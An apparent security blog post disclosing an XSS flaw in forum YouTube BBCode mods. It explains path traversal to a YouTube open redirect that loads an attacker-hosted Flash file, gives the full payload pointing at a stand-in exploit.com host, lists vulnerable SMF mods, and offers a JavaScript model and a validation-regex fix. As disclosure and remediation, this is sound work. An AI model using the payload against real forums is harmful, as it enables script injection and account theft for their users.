Well, I want to explain first that this was not my idea: someone at irc.irchighway.net/#slackers discussed this a while ago, but he wasn't able to find a redirection URL at YouTube.
A couple of days ago I found such a URL, and now I can't remember who he was; please, if you read this, send me an e-mail so I can modify this post for the credits.
[[ UPDATE ]] kuza55 found out that Kyran was the one who came up with the idea [[ /UPDATE ]]
Well, discussing this with the guys at w4ck1ng, it appears that the vulnerability is rather complex to understand, so here it is step by step.
- First, we know that if we can embed a Flash movie into a site, we can perform XSS attacks by means of getURL("javascript:code_here"); the JavaScript runs in the context of the page that embeds the movie (as long as that page does not restrict it with allowScriptAccess).
- Second, we know that we can't embed an arbitrary movie into just any forum (at least not by default).
- Third, we know there are thousands of forums that have YouTube mods installed, so their users can link to movies and watch them without leaving the site.
- Fourth, the YouTube mods (at least the ones I found) have no regular expression validating that the linked video ID is valid; they just glue the user-supplied value onto a fixed prefix:
http://www.youtube.com/v/{param_here}
thinking that in this way an attacker won't be able to change the domain. They are right about the domain, but nothing stops the attacker from changing the path.
- Fifth, YouTube doesn't have any obviously visible redirection URL that forwards to an arbitrary site, but if you found a redirection page, you could do:
http://www.youtube.com/v/../redirection?page=http://your.swf.exploit/
- Sixth, the redirection page inside YouTube is http://www.youtube.com/confirm_email?next=http://new.url/
- Seventh, combining steps 4, 5 and 6, the exploit looks like this (the browser collapses the "../" before sending the request, so the embed really loads http://www.youtube.com/confirm_email?next=http://exploit.com/swf, which forwards the player to the attacker's SWF, and that SWF then runs its getURL("javascript:...") in the forum's origin):
[youtube=1,1]../confirm_email?next=http://exploit.com/swf[/youtube]
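As an added example (this is not code from the original post, nor from any of the mods listed below), here is a JavaScript model of the [youtube] BBCode handler of a forum mod: the unsafe version only pins the scheme and host, the safe version also validates the video ID. It also shows the URL the browser really requests once the dot segments are resolved. All function names and the sample posts are assumptions of mine, and the regex allows "-" because real YouTube IDs contain it.

```javascript
// Added example (not code from the original post or from any of the listed mods).
// Models the [youtube] BBCode handler of a forum mod; function names are assumed.

const YOUTUBE_EMBED_BASE = 'http://www.youtube.com/v/';
// YouTube video IDs are 11 characters of [A-Za-z0-9_-]
// (the phpBB mod's pattern quoted in the post omits the '-').
const VIDEO_ID = /^[A-Za-z0-9_-]{11}$/;
// Matches [youtube]id[/youtube] and [youtube=w,h]id[/youtube]
const YOUTUBE_TAG = /\[youtube(?:=[^\]]*)?\]([^\[\]]*)\[\/youtube\]/g;

// Attribute escaping, as a mod calling htmlspecialchars() would do.
// It does NOT stop the attack: the payload contains none of these characters.
function escapeAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function embedTag(param) {
  return '<embed src="' + escapeAttr(YOUTUBE_EMBED_BASE + param) +
         '" type="application/x-shockwave-flash"></embed>';
}

// Vulnerable: whatever sits between the tags is glued onto the fixed prefix,
// so the domain is fixed but the path is attacker-controlled.
function renderPostUnsafe(body) {
  return body.replace(YOUTUBE_TAG, (_m, param) => embedTag(param));
}

// Hardened: only a syntactically valid video ID reaches the prefix.
function renderPostSafe(body) {
  return body.replace(YOUTUBE_TAG, (_m, param) =>
    VIDEO_ID.test(param) ? embedTag(param) : '[invalid youtube id]');
}

// First src="..." attribute of the rendered HTML, attribute-decoded.
function embedSrc(html) {
  const m = /src="([^"]*)"/.exec(html);
  if (!m) return null;
  return m[1].replace(/&quot;/g, '"').replace(/&lt;/g, '<')
             .replace(/&gt;/g, '>').replace(/&amp;/g, '&');
}

// The URL the browser actually fetches for that src: the URL parser
// collapses "/v/../" before the request leaves the browser.
function requestedUrl(src) {
  return new URL(src).href;
}

// Constructed sample posts (not real forum data).
const PAYLOAD = '../confirm_email?next=http://exploit.com/swf';
const EVIL_POST = 'look at this [youtube=1,1]' + PAYLOAD + '[/youtube]';
const GOOD_POST = 'look at this [youtube=1,1]dQw4w9WgXcQ[/youtube]';

// Unsafe mod: the player is sent to the open redirect, which forwards it to
// the attacker's SWF; its getURL("javascript:...") then runs in the forum origin.
console.log(requestedUrl(embedSrc(renderPostUnsafe(EVIL_POST))));
// Hardened mod: the payload never becomes an embed at all.
console.log(renderPostSafe(EVIL_POST));
console.log(requestedUrl(embedSrc(renderPostSafe(GOOD_POST))));
```

The point of embedSrc plus requestedUrl is that what the mod writes into the HTML and what the browser requests are two different strings: the mod sees a URL that starts with http://www.youtube.com/v/, the server sees a request for /confirm_email. Escaping for HTML does nothing here; only restricting the value to the ID alphabet closes the hole.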
The fix is to validate the video ID with a regular expression before building the URL, e.g.:
^[a-zA-Z0-9_]{11}$
(like the phpBB mod does). Note that real YouTube IDs can also contain "-", so the pattern should really be ^[a-zA-Z0-9_-]{11}$ or some legitimate videos get rejected.
[EDIT]
List of vulnerable SMF mods:
- http://www.simplemachines.org/community/index.php?topic=107067.0
- http://www.simplemachines.org/community/index.php?topic=165018.0
- http://www.simplemachines.org/community/index.php?topic=139271.0
Not vulnerable:
Unsafe IPB YouTube mod installation:
[/EDIT]